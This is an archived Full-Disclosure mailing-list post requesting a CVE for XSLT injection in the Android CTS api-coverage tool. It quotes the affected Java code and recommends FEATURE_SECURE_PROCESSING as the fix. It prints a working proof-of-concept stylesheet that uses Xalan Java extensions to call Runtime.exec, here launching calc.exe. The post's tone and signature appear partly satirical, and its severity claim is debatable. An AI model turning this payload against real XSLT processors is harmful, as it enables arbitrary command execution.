lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <CAGGN9efZy3Nx8X2JHpWQmH7wAdeztJ3jLF93R1f7sLFJoyShqw@mail.gmail.com>
Date: Sun, 19 Oct 2014 19:28:33 +1000
From: Lord Tuskington <l.tuskington@...il.com>
To: fulldisclosure@...lists.org, oss-security@...ts.openwall.com
Subject: [FD] CVE request: remote code execution in Android CTS

CTS parses api-coverage.xsl without providing the FEATURE_SECURE_PROCESSING
option. See lines 60-67 of
cts/tools/cts-api-coverage/src/com/android/cts/apicoverage/HtmlReport.java:

InputStream xsl =
CtsApiCoverage.class.getResourceAsStream("/api-coverage.xsl");
StreamSource xslSource = new StreamSource(xsl);
TransformerFactory factory = TransformerFactory.newInstance();
Transformer transformer = factory.newTransformer(xslSource);

StreamSource xmlSource = new StreamSource(xmlIn);
StreamResult result = new StreamResult(out);
transformer.transform(xmlSource, result);

An attacker who is able to control api-coverage.xsl could inject arbitrary
code into it, which would be executed. For example:

<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
xmlns:str="http://xml.apache.org/xalan/java/java.lang.String"
>
<xsl:output method="text"/>
    <xsl:template match="/">
       <xsl:variable name="Command"><![CDATA[calc.exe]]></xsl:variable>
       <xsl:variable name="RT" select="rt:getRuntime()"/>
       <xsl:variable name="proc" select="rt:exec($RT, $Command)"/>
       <xsl:text>Process: </xsl:text><xsl:value-of select="$proc"/>
    </xsl:template>
</xsl:stylesheet>

Would pop a calc. This crosses a trust boundary because an attacker could
provide an XSL stylesheet that, for example, has enhanced visual layout. A
person consuming that stylesheet would assume it could not possibly contain
arbitrary code that would be executed, as it's just a stylesheet. The XSL
extensions to execute code should be disabled by passing
FEATURE_SECURE_PROCESSING.

Regards

Lord Tuskington

Chief Financial Pinniped

TuskCorp

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists